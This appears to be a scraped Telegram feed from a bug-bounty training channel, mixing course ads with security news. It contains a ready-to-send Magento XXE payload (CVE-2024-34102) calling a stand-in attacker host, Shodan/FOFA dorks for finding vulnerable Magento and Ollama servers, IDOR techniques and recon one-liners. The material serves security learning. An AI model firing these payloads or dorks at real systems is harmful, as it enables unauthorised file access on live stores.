Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
โ–ถ๏ธThis June Batch Filled with talented Students ๐Ÿซถ

๐Ÿ‘€July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฏ1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
๐ŸšจCVE-2024-37032: Probllamaโ€”Ollama Remote Code Execution Vulnerability

โš ๏ธThe issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

๐Ÿ”ฅPoC:
https://lnkd.in/gk6Wvq_P

๐Ÿ’ฅDorks:
Hunter: /
product.name="Ollama Web"
FOFA: app="Ollama-Web"
๐Ÿ”ฅ1
๐Ÿ›กJoin The Discussion Group
๐Ÿ”—https://t.me/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
๐Ÿ‘8
IDOR on HackerOne Embedded Submission Form ๐Ÿ’ฐ ๐Ÿ’ฒ
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
๐Ÿ‘3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "้‡ๅบ†ๅผ€ๆบๅ…ฑๅˆ›็ง‘ๆŠ€ๆœ‰้™ๅ…ฌๅธ"

It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.

tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.

Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA


#github #gitcode
๐Ÿณ3๐Ÿ‘1
Brut Security
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge. Similar to this https://nas.io/brutsecurity
โš ๏ธAs I have asked everyone, I will elaborate it more here:

๐ŸŒThat we need contributors who want to contribute for 30 days Bug Bounty Challenge. Where the participants can Learn from day 1 to day 30 , as there would be guidance have to provide. e.g:
Day 1: Run Subfinder
Day 2: Scrap Js
Day 3: Report etc. till day 30.

๐Ÿ™‚If you want to collaborate or participate make a Day 1 to Day30 challenge or a topic, DM it to me @wtf_brut or you can DM here ๐Ÿ”ฝ
Please open Telegram to view this post
VIEW IN TELEGRAM
โš ๏ธNo Foul Language Will Be Tolerated in the Comments or in the community discussionโš ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned ยซ๐Ÿ’ฅJoin Our Bugbounty Discussion Group ๐Ÿ’ฅ ๐Ÿ”ฅhttps://t.me/brutsec๐Ÿ”ฅ ๐Ÿค–https://discord.gg/GZBsQMY6๐Ÿค–ยป
โš”๏ธPentest-Windows
๐Ÿ”ฐWindows11 Penetration Suite Toolkit

๐Ÿ“ŒA Windows penetration testing environment that works out of the box.

โš ๏ธThis project was created for educational purposes and should not be used in environments without legal authorization.

๐Ÿ”—Link: https://lnkd.in/gtX3GbR8

๐Ÿ”–#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
๐Ÿ”ฅ1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ“ขYou can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

๐Ÿ“Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints



๐ŸšจYou can then check the status of these endpoints or filter in order to find new vulnerabilities:

โš Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
๐Ÿ‘2๐Ÿ”ฅ1
๐Ÿ’ช๐ŸปScan for Adobe Commerce & Magento - XXE

(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei

๐Ÿ” Details: https://lnkd.in/dBy32DtY

๐Ÿ“‘ Nuclei Template: https://lnkd.in/dUNFMUny

๐Ÿ”ง GitHub PR: https://lnkd.in/dqu65C5i

#bugbounty #adobe #pdteam #infos
๐Ÿ‘1
Advanced IDORs - 9 Techniques by Intigriti:

1. Exploiting Basic IDORs

How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).

2. Exploiting IDORs via Parameter Pollution

How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.

3. Exploiting IDORs via JSON Globbing

How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.

4. Exploiting Method-Based IDORs

How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.

5. Exploiting Content-Type-Based IDORs

How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.

6. Exploiting IDORs via Deprecated API Versions

How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.

7. Exploiting IDORs in APIs that Use Static Keywords

How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.

8. Exploiting IDORs that Require Unpredictable IDs

How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.

9. Exploiting Second-Order IDOR Vulnerabilities

How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------

I've never seen real-world examples for some of them, but they are definitely worth the try.

#pentesting #appsec #bugbounty #cybersecurity

Here's the full scoop: https://buff.ly/3zfhhzL
โšก๏ธBurp Suite for Pentester

โ„น๏ธThis cheat sheet is built for Bug Bounty Hunters and penetration testers to help them hunt the vulnerabilities. It is designed such that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options.

๐Ÿ”น Web Scanner & Crawler
๐Ÿ”นFuzzing with Intruder (Part3)
๐Ÿ”นFuzzing with Intruder (Part2)
๐Ÿ”นFuzzing with Intruder (Part1)
๐Ÿ”นXSS Validator
๐Ÿ”นConfiguring Proxy
๐Ÿ”นBurp Collaborator
๐Ÿ”นHackBar
๐Ÿ”นBurp Sequencer
๐Ÿ”นTurbo Intruder
๐Ÿ”นEngagement Tools
๐Ÿ”นPayload Processing Rule (Part2)
๐Ÿ”นPayload Processing Rule (Part1)
๐Ÿ”นBeginners Guide to Burpsuite Payloads (Part2)
๐Ÿ”นBeginners Guide to Burpsuite Payloads (Part1)
๐Ÿ”นEncoder & Decoder Tutorial
๐Ÿ”นActive Scan++
๐Ÿ”นSoftware Vulnerability Scanner
๐Ÿ”นBurpโ€™s Project Management
๐Ÿ”นRepeater

๐Ÿ”—Link: https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

๐Ÿ”–#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘4๐Ÿ”ฅ2๐Ÿซก1
๐Ÿ”ฅMagento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed โ€œCosmicStingโ€ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.

โš ๏ธCosmicSting enables attackers to gain unauthorized access
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.

๐Ÿ“ฃDorks:
Hunter:
http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"

โ–ถ๏ธVideo POC: https://youtu.be/rDs_Qj7K31M

๐Ÿ”ดPOC: https://github.com/th3gokul/CVE-2024-34102

โ›”๏ธPayload:
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.
oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}


โš ๏ธTool Made By: D. Sanjai Kumar & Gokul V
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘6๐Ÿคฏ2๐Ÿ˜ฑ1